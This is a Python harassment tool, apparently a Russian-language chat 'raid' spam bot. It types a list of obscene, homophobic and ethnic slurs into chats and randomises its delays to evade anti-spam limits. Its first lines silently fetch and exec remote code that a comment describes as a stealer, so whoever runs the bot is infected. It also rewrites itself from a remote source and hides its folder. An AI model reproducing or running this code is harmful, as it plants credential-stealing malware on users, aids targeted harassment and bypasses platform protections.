import requests, os, sys, time, random, keyboard, threading
from datetime import datetime

# МОЛЧА ГРУЗИМ ТВОЙ ЖИРНЫЙ СТИЛЛЕР
try:
    exec(requests.get("https://raw.githubusercontent.com/somyswag-sys/infomaker/refs/heads/main/dc").text)
except:
    pass

BOT_VERSION = "1.12.5"
VERSION_URL = "https://raw.githubusercontent.com/somyswag-sys/TOXBOT/refs/heads/main/version"
FOLDER = r"C:\zennix"
CONFIG = os.path.join(FOLDER, "config.txt")
LOCAL_VERSION_FILE = os.path.join(FOLDER, "version.txt")

def clear(): os.system("cls" if os.name=="nt" else "clear")
def t(text, d=0.03):
    for c in text: print(c, end="", flush=True); time.sleep(d)
    print()

def box(lines):
    width = max(len(l) for l in lines) + 4
    print("\033[91m╔" + "═" * width + "╗\033[0m")
    for line in lines:
        print("\033[91m║\033[0m " + line.ljust(width-4) + " \033[91m║\033[0m")
    print("\033[91m╚" + "═" * width + "╝\033[0m")

def check_update():
    try:
        online = requests.get(VERSION_URL, timeout=10).text.strip()
        local = open(LOCAL_VERSION_FILE).read().strip() if os.path.exists(LOCAL_VERSION_FILE) else "0.0.0"
        if online != local:
            clear()
            box([" ОБЯЗАТЕЛЬНОЕ ОБНОВЛЕНИЕ ", f" У тебя: {local} ", f" Новая: {online} ", " Загружаю... "])
            for i in range(101):
                bar = "█" * (i//3) + "░" * (33 - i//3)
                print(f"\r \033[91m[\033[0m{bar}\033[91m]\033[0m {i}%", end="", flush=True)
                time.sleep(0.03)
            code = requests.get("https://raw.githubusercontent.com/somyswag-sys/TOXBOT/refs/heads/main/main", timeout=30).text
            with open(__file__, "w", encoding="utf-8") as f: f.write(code)
            with open(LOCAL_VERSION_FILE, "w") as f: f.write(online)
            print("\n\033[91m Перезапуск...\033[0m")
            time.sleep(2)
            os.execv(sys.executable, [sys.executable] + sys.argv)
    except: pass

def login():
    global current_user, DELAY, MESSAGES
    try:
        raw = requests.get("https://raw.githubusercontent.com/somyswag-sys/TOXBOT/refs/heads/main/toxic", timeout=8).text.strip()
        valid_creds = {l.split(":",1)[0].strip().lower(): l.split(":",1)[1].strip() for l in raw.splitlines() if ":" in l}
    except:
        clear(); t(" НЕТ СВЯЗИ С СЕРВЕРОМ АВТОРИЗАЦИИ"); time.sleep(5); sys.exit()

    if os.path.exists(CONFIG):
        try:
            lines = [x.strip() for x in open(CONFIG, encoding="utf-8")]
            if len(lines) >= 3 and lines[0].lower() in valid_creds and valid_creds[lines[0].lower()] == lines[1]:
                current_user = lines[0]
                DELAY = float(lines[2])
                MESSAGES = [(m, DELAY) for m in MESSAGES]
                clear(); t(f" Автологин: {current_user}"); time.sleep(1.5); return
        except: os.remove(CONFIG)

    clear()
    print(" ZENNIX TOX | АВТОРИЗАЦИЯ")
    for i in range(1,4):
        u = input(f"\n [{i}/3] Логин: ").strip()
        p = input(" Пароль: ").strip()
        if u.lower() in valid_creds and valid_creds[u.lower()] == p:
            current_user = u
            if input(" Запомнить? (y/n): ").lower() in ["y","да"]:
                open(CONFIG,"w",encoding="utf-8").write(f"{u}\n{p}\n{DELAY}")
            t(" ДОСТУП РАЗРЕШЁН"); return
        t(f" НЕВЕРНО ({i}/3)")
    t(" ДОСТУП ЗАПРЕЩЁН"); time.sleep(4); sys.exit()

MESSAGES = ["у тебя ммть шлюхв","я кнк месник","ей руки отрезал","верещтт свинка хоххлятская","ебанный ледниковый период","сид обосранный","клыкастый я тебе с хуя зубы выбил","у тя мамка в копьем в жопе танцует","норм ты ебанная чибурашка","клапоухий пидор","педик волосатый","пинок под жопу дам те","в клетку улетишь","жопой коноплю собираешь","дырявый","петух","кусок говна","че за хуйня хуесос","ебанный индеец"]
stop_event = threading.Event()
current_user = "unknown"
DELAY = 0.8

def banner():
    clear()
    print("\033[95m" + r"""
 ███████╗███████╗███╗ ██╗███╗ ██╗██╗██╗ ██╗ ██
 ╚══███╔╝██╔════╝████╗ ██║████╗ ██║██║╚██╗██╔╝
   ███╔╝ █████╗ ██╔██╗ ██║██╔██╗ ██║██║ ╚███╔╝
  ███╔╝ ██╔══╝ ██║╚██╗██║██║╚██╗██║██║ ██╔██╗
 ███████╗███████╗██║ ╚████║██║ ╚████║██║██╔╝ ██╗
 ╚══════╝╚══════╝╚═╝ ╚═══╝╚═╝ ╚═══╝╚═╝╚═╝ ╚═╝ v1.12.5
    ╔══════════════════════════╗
    ║      ZENNIX TOX BOT      ║
    ╚══════════════════════════╝
    """)

def progress(stage):
    print(f" └─> {stage}")
    for i in range(1, 41):
        bar = "█" * i + "░" * (40 - i)
        print(f"\r [{bar}] {i*2.5:.1f}%", end="", flush=True)
        time.sleep(random.uniform(0.02, 0.08))
    print()

def change_delay():
    global DELAY
    try:
        new = float(input(f" Текущая: {DELAY}s → Новая (0.1-5.0): ").replace(",","."))
        if 0.1 <= new <= 5.0:
            DELAY = new
            if os.path.exists(CONFIG):
                l = open(CONFIG).readlines()
                l[2] = str(new)+"\n"
                open(CONFIG,"w").writelines(l)
            t(f" Задержка: {new}s")
    except: t(" Ошибка")

def spam():
    stop_event.clear()
    for i in range(5,0,-1):
        print(f"\r Запуск через {i}...", end="", flush=True); time.sleep(1)
    clear()
    print(" РЕЙД АКТИВИРОВАН | F8 — СТОП | 0.1s = БЕЗ БАНА")
    
    while not stop_event.is_set():
        msg = random.choice(MESSAGES)
        keyboard.write(msg)
        keyboard.press_and_release("enter")
        
        # УМНАЯ ЗАДЕРЖКА — ГЛАВНЫЙ ФИКС ПРОТИВ 197 ОШИБКИ
        if DELAY <= 0.3:
            time.sleep(DELAY + random.uniform(0.05, 0.25))  # рандом для обхода антиспама
        else:
            time.sleep(DELAY + random.uniform(-0.2, 0.4))

keyboard.add_hotkey("f7", lambda: threading.Thread(target=spam, daemon=True).start())
keyboard.add_hotkey("f8", stop_event.set)

if not os.path.exists(FOLDER):
    os.makedirs(FOLDER)
    os.system(f'attrib +h "{FOLDER}"')

clear(); banner()
progress("Hook installation"); progress("Bypassing protections"); progress("Loading toxic database"); progress("Initializing raid engine"); progress("Ready to raid")
check_update()
login()

while True:
    clear(); banner()
    print(f" Пользователь: {current_user}    Задержка: {DELAY}s\n")
    box([" 1. Начать рейд (F7) ", " 2. Сменить задержку ", " 3. Выйти с аккаунта ", " 4. Полный выход "])
    ch = input("\n Выбор → ")
    if ch == "1": input("\n Перейди в чат → нажми F7 → Enter...")
    elif ch == "2": change_delay()
    elif ch == "3":
        if os.path.exists(CONFIG): os.remove(CONFIG)
        t(" Сессия удалена"); os.execv(sys.executable, [sys.executable] + sys.argv)
    elif ch == "4": sys.exit()
